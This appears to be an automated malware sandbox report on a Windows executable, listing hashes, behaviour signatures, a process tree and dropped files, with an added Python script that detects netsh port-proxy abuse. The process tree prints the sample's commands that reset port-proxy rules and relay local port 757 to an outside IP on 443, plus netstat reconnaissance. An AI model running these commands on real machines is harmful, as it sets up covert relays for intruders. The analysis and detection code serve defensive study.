Analysis

  • max time kernel
    66s
  • max time network
    147s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240221-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    19-03-2024 18:57

General

  • Target
    a3357e7ea44e4d30304b1e5a4f53da37c848ce10fda0bd03a4f0dc0c5220e336.exe
  • Size
    397KB
  • MD5
    6f593dbea0a8703af52bd66f582251a4
  • SHA1
    2201a210e9680ec079b08bdb1da6d23112d87dcc
  • SHA256
    a3357e7ea44e4d30304b1e5a4f53da37c848ce10fda0bd03a4f0dc0c5220e336
  • SHA512
    97ebc0b7f27a76efead93fce05a8d059b4c6629e6348d5d4b728ed910ab00848b44737c6b5a48ac070d62a1da9273fc72b809fcf36bd17afb573fccc33d5aa73
  • SSDEEP
    6144:rqJycjfxGqz7J1Bn+F7potY9kxqqJrNzS:rq8cj5fR+MO9kPJrhS

Score
8/10

Malware Config

Signatures

  • Sets file execution options in registry (Image File Execution Options) (2 TTPs, 25 IoCs)
  • Modifies PowerShell logging option (1 TTP)
  • Drops file in Windows directory (2 IoCs)
  • Gathers network information (2 TTPs, 3 IoCs): uses a command-line utility to view network configuration.
  • Suspicious behavior: EnumeratesProcesses (5 IoCs)
  • Suspicious use of AdjustPrivilegeToken (5 IoCs)
  • Suspicious use of WriteProcessMemory (24 IoCs)

Processes

  • C:\Users\Admin\AppData\Local\Temp\a3357e7ea44e4d30304b1e5a4f53da37c848ce10fda0bd03a4f0dc0c5220e336.exe
    "C:\Users\Admin\AppData\Local\Temp\a3357e7ea44e4d30304b1e5a4f53da37c848ce10fda0bd03a4f0dc0c5220e336.exe"
    1⤵
    • Sets file execution options in registry
    • Drops file in Windows directory
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1920
    • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ekktuv8h.cmdline"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3800
      • C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5AE2.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC5AE1.tmp"
        3⤵
        PID:3512
    • C:\Windows\system32\chcp.com
      "C:\Windows\system32\chcp.com" 437
      2⤵
      PID:3588
    • C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" interface portproxy show all
      2⤵
      PID:4064
    • C:\Windows\system32\NETSTAT.EXE
      "C:\Windows\system32\NETSTAT.EXE" -na
      2⤵
      • Gathers network information
      • Suspicious use of AdjustPrivilegeToken
      PID:2512
    • C:\Windows\system32\NETSTAT.EXE
      "C:\Windows\system32\NETSTAT.EXE" -na
      2⤵
      • Gathers network information
      • Suspicious use of AdjustPrivilegeToken
      PID:4388
    • C:\Windows\system32\NETSTAT.EXE
      "C:\Windows\system32\NETSTAT.EXE" -na
      2⤵
      • Gathers network information
      • Suspicious use of AdjustPrivilegeToken
      PID:1752
    • C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" interface portproxy reset
      2⤵
      PID:4464
    • C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" interface portproxy show all
      2⤵
      PID:2144
    • C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 listenport=757 connectport=443 connectaddress=5.133.65.53
      2⤵
      PID:2720
    • C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" interface portproxy show all
      2⤵
      PID:4436
    • C:\Windows\system32\netsh.exe
      "C:\Windows\system32\netsh.exe" interface portproxy show all
      2⤵
      PID:4692
  • C:\Windows\system32\msiexec.exe
    C:\Windows\system32\msiexec.exe /V
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:3092
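The netsh sequence in the tree above (show all, reset, add v4tov4, show all) turns the host into a TCP relay: anything connecting to local port 757 is forwarded to 5.133.65.53:443. The following is an added Python example, not part of this report or of the sample, showing how to pick that sequence out of process-creation records and what to hunt for afterwards. The (pid, command line) event shape is an assumption standing in for Sysmon Event ID 1 or Security 4688 data; the sample events are constructed from the command lines on this page; and the registry location is where netsh itself persists v4tov4 TCP rules (a documented netsh behaviour, not something this report displays).

```python
"""Triage of 'netsh interface portproxy' activity from process-creation events.

Added example, not part of the sandbox report. The events below are constructed
from the command lines in the process tree above; the (pid, command_line) shape
is an assumption standing in for Sysmon Event ID 1 / Security 4688 records.
"""
import ipaddress
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

# netsh persists v4tov4 TCP rules here as values named "<listenaddress>/<listenport>"
# holding "<connectaddress>/<connectport>"; an omitted listen address is stored as "*".
PORTPROXY_KEY = r"HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4\tcp"

# Tolerates a quoted image path ("...\netsh.exe") and mixed case.
PORTPROXY_RE = re.compile(
    r'netsh(?:\.exe)?"?\s+interface\s+portproxy\s+(?P<verb>add|delete|reset|show)\b'
    r'(?:\s+(?P<kind>v4tov4|v4tov6|v6tov4|v6tov6)\b)?(?P<rest>.*)$',
    re.IGNORECASE,
)
KV_RE = re.compile(r'(listenport|listenaddress|connectport|connectaddress)=([^\s"]+)', re.IGNORECASE)


@dataclass
class PortProxyEvent:
    pid: int
    verb: str                 # add | delete | reset | show
    kind: Optional[str]       # v4tov4 etc.; None for "reset" and "show all"
    listenaddress: str = "*"
    listenport: Optional[int] = None
    connectaddress: Optional[str] = None
    connectport: Optional[int] = None


def parse_portproxy(pid: int, cmdline: str) -> Optional[PortProxyEvent]:
    """Return a PortProxyEvent when the command line drives netsh's portproxy context."""
    m = PORTPROXY_RE.search(cmdline)
    if not m:
        return None
    ev = PortProxyEvent(pid=pid, verb=m.group("verb").lower(),
                        kind=(m.group("kind") or "").lower() or None)
    for key, val in KV_RE.findall(m.group("rest")):
        key = key.lower()
        setattr(ev, key, int(val) if key.endswith("port") else val)
    return ev


def registry_artifact(ev: PortProxyEvent) -> Optional[Tuple[str, str, str]]:
    """(key, value name, data) that an 'add v4tov4' rule leaves behind for later hunting."""
    if ev.verb != "add" or ev.kind != "v4tov4" or ev.listenport is None:
        return None
    return (PORTPROXY_KEY, f"{ev.listenaddress}/{ev.listenport}",
            f"{ev.connectaddress}/{ev.connectport}")


def assess(ev: PortProxyEvent) -> List[str]:
    """Reasons the event deserves attention; an empty list means purely informational."""
    reasons: List[str] = []
    if ev.verb == "reset":
        reasons.append("reset clears every existing portproxy rule before new ones are added")
    if ev.verb == "add":
        reasons.append("host becomes a TCP relay (listenport -> connectaddress:connectport)")
        try:
            if ipaddress.ip_address(ev.connectaddress).is_global:
                reasons.append(f"relay target {ev.connectaddress} is a public address")
        except ValueError:
            reasons.append(f"relay target {ev.connectaddress!r} is not an IP literal")
        if ev.connectport == 443 and ev.listenport != 443:
            reasons.append(f"nonstandard local port {ev.listenport} relayed to remote 443")
    return reasons


def scan(events: List[Tuple[int, str]]):
    """Run every process-creation record through the parser and keep the portproxy ones."""
    findings = []
    for pid, cmdline in events:
        ev = parse_portproxy(pid, cmdline)
        if ev is not None:
            findings.append((ev, assess(ev), registry_artifact(ev)))
    return findings


# Constructed from the process tree above (pid, command line); not a real log export.
SAMPLE_EVENTS: List[Tuple[int, str]] = [
    (3588, r'"C:\Windows\system32\chcp.com" 437'),
    (4064, r'"C:\Windows\system32\netsh.exe" interface portproxy show all'),
    (2512, r'"C:\Windows\system32\NETSTAT.EXE" -na'),
    (4464, r'"C:\Windows\system32\netsh.exe" interface portproxy reset'),
    (2720, r'"C:\Windows\system32\netsh.exe" interface portproxy add v4tov4 '
           r'listenport=757 connectport=443 connectaddress=5.133.65.53'),
    (4692, r'"C:\Windows\system32\netsh.exe" interface portproxy show all'),
]

if __name__ == "__main__":
    for ev, reasons, artifact in scan(SAMPLE_EVENTS):
        print(f"PID {ev.pid}: netsh portproxy {ev.verb} {ev.kind or ''}".rstrip())
        for r in reasons:
            print(f"    ! {r}")
        if artifact:
            key, name, data = artifact
            print(f"    hunt: {key}  {name} = {data}")
```

The registry artifact is the durable part: the rule survives reboots and the netsh process is long gone by the time anyone looks, so a host-wide sweep of that key (reg query or Get-ItemProperty) finds relays that process telemetry missed. Note that the `show all` calls on their own are harmless and are left unflagged; the reset immediately before the add is the tell, since it discards any rule an administrator had legitimately configured.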

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Local\Temp\RES5AE2.tmp
    Filesize: 1KB
    MD5: 9ff61671f477cc5072a7485eb9a2f004
    SHA1: 8bfffd2605d038ac06b8e2910eb9601e41127949
    SHA256: 0b3db4a12b5da92c18b13d431d8a546807279154988a627ade6fe5f97fd5e6e8
    SHA512: e9bf011bb5bf16eaa6627b5afa925ddbb38dabd004597911244914fa308e2e1ce0f69cb8cc32d54f7c476cc4dae88a2aa171518aaddaed63b7b1d0527101e4db
  • C:\Users\Admin\AppData\Local\Temp\ekktuv8h.dll
    Filesize: 3KB
    MD5: ed426e67ba83c25194b737513a3a9a00
    SHA1: ebcd70aefed1d5e3c8b6fc841985e19ffdcbd831
    SHA256: a432d0adc3ef80e4486c808ebefe2fada18e62ed0d57ea22c6beff5025cc981d
    SHA512: a4edb33e540720087139693977cb32c3b5e508ebb7aa261a778c1f47d4b24172d1cb00f2608e086db11f2fe64b38e2c9096d68c71af31f0d5f94f76c94b92456
  • C:\Users\Admin\AppData\Local\Temp\ekktuv8h.pdb
    Filesize: 11KB
    MD5: f36a7bb475dd6b02e711581416761e95
    SHA1: f15a1066818bdcdad8607f07eca44b4aa665bb5b
    SHA256: 6cd222d2f5a55192e3d1f4bc1ba43b10e4c774328456ab948229fa50d974c6fc
    SHA512: 63063156a41692b3ed08e131251f19b7084fa72bb380c233c9575d2f07a99a1a613545fdf892099d03521f2bedfb7168ccce486b468f2effb3292bb3a82edbd9
  • C:\Windows\SoftwareDistribution\config.xml
    Filesize: 516B
    MD5: 92714417a26162d7918c9875c70f8ed9
    SHA1: e017c2eb9e2aad8b8bf1f24e7411d28165242a7a
    SHA256: 1e6f789ba5f3d163e06cfe7caf54b366971ad5a0a5e54c8f76e3523a36f6a24f
    SHA512: de27961363f22d8ee3f05cec3c32bd359b90c1ddac43f5dfa58b01d50c8195b24834568d6287726b74bda691bf1ab321790e61dd8eab225cebf1ecd107a676ed
  • \??\c:\Users\Admin\AppData\Local\Temp\CSC5AE1.tmp
    Filesize: 652B
    MD5: ba1de9c05a54ca17b9c7bf139416c350
    SHA1: d07431ddf2c043edb1cebdb9d432524230632a1d
    SHA256: 5cddeb7fc74ac72f9cfaea395cd655e3cd2772317e3501b8f7405d380bc10b0c
    SHA512: f6e1e54896e5d0aa043221dfb86ab7c2adbaa3b210018b4e66a7a1c361dc115626a212b9140e29cd938efc967b0bec3f4203cce02a1aed41237f335d64227dce
  • \??\c:\Users\Admin\AppData\Local\Temp\ekktuv8h.0.cs
    Filesize: 447B
    MD5: 1640a04633fee0dfdc7e22c4f4063bf6
    SHA1: 3cb525c47b5dd37f8ee45b034c9452265fba5476
    SHA256: 55e16d2ca3e65ce6c62cd5be2af5d7264445c5d7e1b5f3be7149acfb47ae42a0
    SHA512: 85c5103dda738d6003d39b0b619e68942965ddb9d6e08e544abf377224fdb29c6cd1501a549e99e57875954cea44b5bdefd7cace018c8123e7bfb717ae0e973d
  • \??\c:\Users\Admin\AppData\Local\Temp\ekktuv8h.cmdline
    Filesize: 309B
    MD5: 8e3e8829f3eab0f2f5f9397716eccab1
    SHA1: c3f68d43630032cb6d65a78c1195c1bf11635b24
    SHA256: 14a2367fe856c72d31e39876008b73671856ac3011a580d2f25124013563d99f
    SHA512: 2c195d0452fa7796843cbc1a1d73527a7db50bda6ef886391315a0acf797ab8507032682bde513c8315cdaad52ddd0531629a04ca5eb1070af35e0214cbee9e0
  • memory/1920-4-0x00000000012E0000-0x000000000137C000-memory.dmp
    Filesize: 624KB
  • memory/1920-19-0x000000001CD80000-0x000000001CD88000-memory.dmp
    Filesize: 32KB
  • memory/1920-3-0x00007FFC81BD0000-0x00007FFC82571000-memory.dmp
    Filesize: 9.6MB
  • memory/1920-2-0x00000000013A0000-0x00000000013B0000-memory.dmp
    Filesize: 64KB
  • memory/1920-0-0x000000001BD40000-0x000000001C20E000-memory.dmp
    Filesize: 4.8MB
  • memory/1920-25-0x00007FFC81BD0000-0x00007FFC82571000-memory.dmp
    Filesize: 9.6MB
  • memory/1920-26-0x00000000013A0000-0x00000000013B0000-memory.dmp
    Filesize: 64KB
  • memory/1920-33-0x000000001DED0000-0x000000001DEE9000-memory.dmp
    Filesize: 100KB
  • memory/1920-1-0x00007FFC81BD0000-0x00007FFC82571000-memory.dmp
    Filesize: 9.6MB
  • memory/3800-10-0x00000000009A0000-0x00000000009B0000-memory.dmp
    Filesize: 64KB